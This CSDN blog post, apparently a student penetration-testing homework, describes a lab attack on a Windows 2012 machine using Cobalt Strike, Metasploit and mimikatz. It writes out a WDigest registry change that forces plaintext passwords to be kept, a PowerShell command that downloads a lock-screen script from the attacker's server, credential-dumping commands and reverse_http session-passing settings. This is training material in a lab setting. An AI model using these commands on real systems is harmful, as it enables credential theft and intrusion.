渗透第二次作业

于 2024-06-28 14:35:48 发布
阅读量889 收藏 20
点赞数 24
文章标签: 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78305580/article/details/140042265
版权

环境信息
攻击IP:192.168.17.132(kali——cs服务端、msf所在主机)

靶机IP:192.168.17.134(win2012)

Cobalt Strike抓取win2012明文密码,以及将会话传递到 Metasploit Framework 上整体过程
1.cs生成木马文件并使目标服务器中马
启动cs(首先启动cs服务器,然后启动客户端)

建立监听

这样一个监听就创建好了

生成木马

使目标服务器中马后,我们就可以获取想要的东西了(这里就不演示了)

2.抓取目标主机的明文密码
目标服务器已上线

因为微软的补丁已经不容许抓取明文密码了,但是我们通过修改注册表来让Wdigest Auth保存明文口令。

shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f
修改注册表成功之后,需要用户注销或者重新登陆之后才会生效。所以我们编写一个强制锁屏脚本(这个脚本只有Windows服务器可以生效)

Function Lock-WorkStation {
 
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
 
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
 
$LockWorkStation::LockWorkStation() | Out-Null
 
}
 
Lock-WorkStation
在锁屏脚本目录下开启http服务器,控制目标服务器下载并执行锁屏脚本

shell powershell (new-object System.Net.WebClient).DownFile('http://192.168.17.132:9999/lock-screen.ps1','c:\lock-screen.ps1') #下载锁屏脚本
shell powershell c:\lock-screen.ps1 #执行锁屏脚本
管理员重新登录后再抓取明文密码

logonpasswords


这样我们使用cs成功抓取win2012服务器的密码了。

3.打开Metasploit Framework
调用 exploit/multi/handler 模块,在该模块上配置 HTTP Payload,为该 payload 的 IP 和 端口设置成 Metasploit Framework 所在主机 IP,端口自定义即可。之后运行该模块

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.17.132
set 9980
run

4.在 Cobalt Strike 上创建一个 Foreign HTTP 的监听
监听 IP 和端口设置成刚才 Metasploit Framework 上所监听的 IP 和端口,接着在 Cobalt Strike 上右击选择要传递的会话,找到 Spawn 选项,选择刚刚创建的监听器即可

成功将cs的会话传递到msf上了。

Metasploit Framework抓取win2012明文密码,以及将会话传递到 Cobalt Strike 上整体过程
1.msf生成木马文件并使服务器中马
启动msf

生成木马

使目标服务器中马后,我们就可以获取想要的东西了(这里就不演示了)

2.抓取目标主机的明文密码
因为微软的补丁已经不容许抓取明文密码了,但是我们通过修改注册表来让Wdigest Auth保存明文口令。(由于我在cs入侵Win2012服务器是已经在服务器上下载过强制锁屏了,所以这就直接使用,不用在进行远程控制下载了。)

shell #进入cmd窗口
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f #修改注册表
powershell  #进入powershell
c:\lock-screen.ps1 #运行强制锁屏脚本
上传mimikatz(和在cs上远程控制服务器下载强制锁屏脚本一样,只需要在kali上开启http服务器就可以了)

启动mimikatz获取明文密码

execute -i -f mimikatz.exe
sekurlsa::logonpasswords


我们使用mimikatz就抓取到了win2012的明文密码。

3.打开Cobalt Strike
创建一个监听

4.打开Metasploit Framework
background 
use exploit/windows/local/payload_inject 
set payload windows/meterpreter/reverse_http
set lhost 192.168.17.132
set lport 8899
set disablepayloadhandler true
set prependmigrate true
set session 2 #根据自己的session值
exploit
成功将msf的会话传递到cs上了。

晚风替我看朝夕
关注
  • 24
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Kali破解windows系统用户名密码工具mimikatz
世间繁华梦一出
07-20 4798
mimikatz工具简介 mimikatz是一款强大的系统密码破解获取工具。该工具有段时间是作为一个独立程序运行。现在已被添加到Metasploit框架中,并作为一个可加载的Meterpreter模块。当成功的获取到一个远程会话时,使用mimikatz工具可以很快的恢复密码。本节将介绍使用mimikatz工具恢复密码。 windows2012以下的系统给可直接获取到明文,2012以上的系统只能获取到hash值。 实例演示 (1)通过在目标主机(Windows 7)上运行kali创建的可执行文件木马程序bac
cs与msf权限传递以及mimikatz抓取win2012明文密码
huizhaohaha的博客
05-25 779
我查找过资料得出,Cobalt Strike 的前身是 Armitage,而 Armitage 又可以理解为 Metasploit Framework 的图形界面版,因此 Cobalt Strike 与 Metasploit Framework 在很多地方都是兼容的,所以我们便可以将 Metasploit Framework 攻击产生的会话传递到 Cobalt Strike 上,同样的 Cobalt Strike 的会话也能够传递到 Metasploit Framework。
实用cs、mimikatz免杀virscan
xxx9686的博客
09-17 1914
第一步:替换资源,此步骤可以直接免杀360及电脑管家,但是无法过火绒。使用Restorator加载mimikatz后在拖入其他程序资源(此处需要注意,资源需要无毒,资源越好效果越佳。sigthief.py -i 软件文件名 -t 木马文件名 -o 输出位置(此处由于软件从虚拟机中考出有问题,无图)。替换版本及图标资源后,需要给软件上数字签名(正儿八经的软件签名我们没有,可以copy别的软件做伪签名)。简单过360,但是资源未过火绒,在此基础上我们给他添加一个壳即可,任意壳,我们添加vm壳。
cs给msf传shell+mimikatz读取明文密码
vt_yjx的博客
05-22 602
set payload windows/meterpreter/reverse_http(注:这里是http,与cs上线的监听器一致)密码是null,是因为官方改的。然后输入密码后给到lsass.exe这个进程,这个进程会存储一份明文再内存中。windows输入密码的进程是winlogon.exe。考虑sam文件了,可以dump出来本地破解出明文。上传一个锁屏脚本,管理员重新输入密码后可以抓明文。mimikatz就抓内存中的明文。set lport 自己的端口号。set lhost 本机ip。
渗透测试笔记】之【内网渗透——横向移动:使用mimikatz和CS进行哈希传递攻击】
AA8j的博客
11-15 3430
文章目录1. mimikatz1.1 NTLM Hash传递攻击1.2 AES-256 哈希传递攻击2. CS2.1 获得一个Beacon2.2 dump Hash2.2.1 方法一2.2.2 方法二2.2.3 查看2.3 哈希传递攻击 1. mimikatz 地址:https://github.com/gentilkiwi/mimikatz 1.1 NTLM Hash传递攻击 首先获得域管NTLM Hash:【渗透测试笔记】之【内网渗透——横向移动:获取Windows明文密码与散列值的若干方法和防御手段
《路基路面工程》第二次作业解答.pdf
10-14
《路基路面工程》第二次作业解答涵盖了多个关键知识点,这些知识点是理解和实践路基路面建设的重要组成部分。 1. 提高路基稳定性的措施主要包括:地下水措施,如设置排水沟、盲沟,防止地下水上升影响路基;隔离...
中石油北京20年春《国际营销》第二次在线作业标准答案.docx
10-24
6. **企业战略**:企业密集型战略包括市场渗透(扩大现有市场份额)、市场开发(开拓新市场)、产品开发(推出新产品)以及混合策略。此外,还有重点集中战略,如差异的重点集中、产品线重点集中、用户重点集中和...
上海开放大学市场营销学第一次网上记分作业答案.zip
03-03
这次的“第一次网上记分作业答案”提供了深入探讨和学习市场营销学的机会。 在解答市场营销学的作业时,学生需要考虑以下几个核心概念: 1. 市场调研:这是了解消费者需求、竞争对手状况和行业趋势的基础。通过...
现代软件工程作业.doc
12-17
软件危机是在软件发展第二阶段末期的规模较大的项目开发中,出现了与当初的计划推迟交工、费用比预算大幅度上升、不能满足用户规定、可靠性低、维护困难等问题,导致了软件危机。 数据流图 数据流图是以图形的方式...
内网渗透系列-mimikatz的使用以及后门植入
lza20001103的博客
04-15 1203
内网渗透系列-mimikatz的使用以及后门植入
cs与msf权限传递,以及mimikatz抓取win2012明文密码
weixin_65785894的博客
05-25 831
1、进入cs界面,首先来到 Cobalt Strike 目录下,启动 Cobalt Strike 服务端(我的cs在这个目录下)11、之后在 Cobalt strike 上右击待传递的会话选择 Spawn ,选择刚刚创建的 Foreign HTTP 监听。11、在 Cobalt strike上先创建一个 Foreign HTTP 监听(注意必须得跟msf设置的端口一致)1、这里选择的是 HTTPS Beacon,添加上主机IP,点击保存,即可创建一个 HTTPS Beacon。
windows账户安全(通过mimikatz、Jhon获取用户密码)
qq_62729556的博客
07-23 2112
使用命令“john-format=NT hash.txt”使用Jhon自带的字典碰撞hash值进行破解。第一步:使用管理员权限,切换到c盘路径,执行命令“reg save hklm\sam sam.hive”和“reg save hklm\system system.hive”将注册表中SAM、System文件导出到本地磁盘。命令“ samdump2 system.hive sam.hive > hash.txt ” 使用sam dump 2工具将sam数据库文件破解成可识别的NTLM hash。
第二次渗透
最新发布
m0_64340736的博客
05-28 190
修改注册表之后,注销用户(强制锁屏进行注销),重新登录才能抓取到明文。
内网渗透系列之mimikatz的使用以及后门植入
lza20001103的博客
09-04 4276
内网渗透系列之mimikatz的使用以及后门植入 文章目录内网渗透系列之mimikatz的使用以及后门植入前言mimikatz的使用后门植入msf永久后门植入(1)Meterpreter后门:Metsvc(2)Meterpreter后门:PersistenceNC后门后记 前言 内网渗透最重要的环节就是权限维持,当我们获取到靶机的权限后,当对方的机器关机后,我们所获取的会话也会跟着消失,也就是说当他重新开启后,我们又得重新进行信息收集,漏洞利用,又重复着上一个渗透的过程,工程量就很大了。所以,为了能一直维持
Winserver2012R2系统之后的密码明文抓取方式
求大佬师傅带
05-20 565
在Windows2012以及win10之前,登录过程是不一样的,首先winlogon进程会把用户输入的用户名和密码传给lsass.exe进程,此进程首先会在内存中存储一份用户名密码的明文,然后将明文做NTLMhash的加密生成密文,再和SAM文件内的hash值进行比对,相同则登录成功,反之登录失败。
【工具使用】——MSF使用_使用MSF抓取用户密码
weixin_45588247的博客
08-08 6691
一、抓取自动登录的密码:   很多用户习惯将计算机设置自动登录,可以使用run windows/gather/credentials/windows_autologin抓取自动登录的用户名和密码。   点击进入:开启windows用户自动登陆的方法! 命令: run windows/gather/credentials/windows_autologin 二、导出密码哈希: 1. run hashdump命令:   hashdump模块可以从SAM数据库中导出本地用户账号,该命令的使用需要系统权限
内网渗透神器(Mimikatz)——使用教程
热门推荐
W小哥
04-16 6万+
一、工具简介 Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 二、Mimikatz命令 cls: 清屏 standard: 标准模块,基本命令 crypto: 加密相关模块 sekurlsa: 与证书相关的模块 kerberos: kerberos模块 privilege: 提权相关模块 process: 进程相关
如何derpnstink靶机渗透,大学毕业作业
06-10
如果您是在大学毕业作业的框架下进行derpnstink靶机的渗透测试,那么您应该首先了解derpnstink靶机的网络架构和安全策略,以及您的渗透测试目标和范围。您需要制定一个详细的计划,包括测试方法、工具和技术,以及测试的时间和资源等。在进行渗透测试之前,确保您已经获得了授权,遵守了相关的法律和道德规范,并且已经得到了derpnstink靶机的所有者或管理员的同意。 在渗透测试过程中,您可以使用一些工具和技术来测试系统的安全性,例如漏洞扫描工具、端口扫描工具、密码破解工具等。您还可以使用社会工程学等技术来测试系统的人为安全漏洞。在测试过程中,您需要记录测试结果和发现的漏洞,并及时向derpnstink靶机的所有者或管理员报告和提供建议和解决方案。 需要注意的是,渗透测试需要严格遵守法律和道德准则,不能对他人造成损害或威胁其安全和隐私。同时,您应该保护好测试过程中获得的敏感信息,以避免泄露和滥用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

晚风替我看朝夕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值